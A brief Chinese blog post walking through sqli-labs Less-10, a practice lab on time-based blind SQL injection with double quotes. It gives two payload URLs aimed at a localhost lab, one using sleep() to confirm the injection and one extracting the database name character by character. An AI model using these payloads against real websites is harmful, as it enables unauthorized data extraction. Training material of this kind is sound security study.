【sqli-labs】 less10 GET - Blind - Time based. - Double quotes (基于时间的双引号盲注)

这个和less9一样，单引号改完双引号就行了

http://localhost/sqli/Less-10/?id=1" and sleep(5)%23

5s后页面完成刷新

http://localhost/sqli/Less-10/?id=1" and if(ascii(substr(database(),1,1))=115, 0, sleep(5))%23

posted @ 2018-01-19 20:47 omnis 阅读(235) 评论(0) 编辑收藏举报

刷新页面返回顶部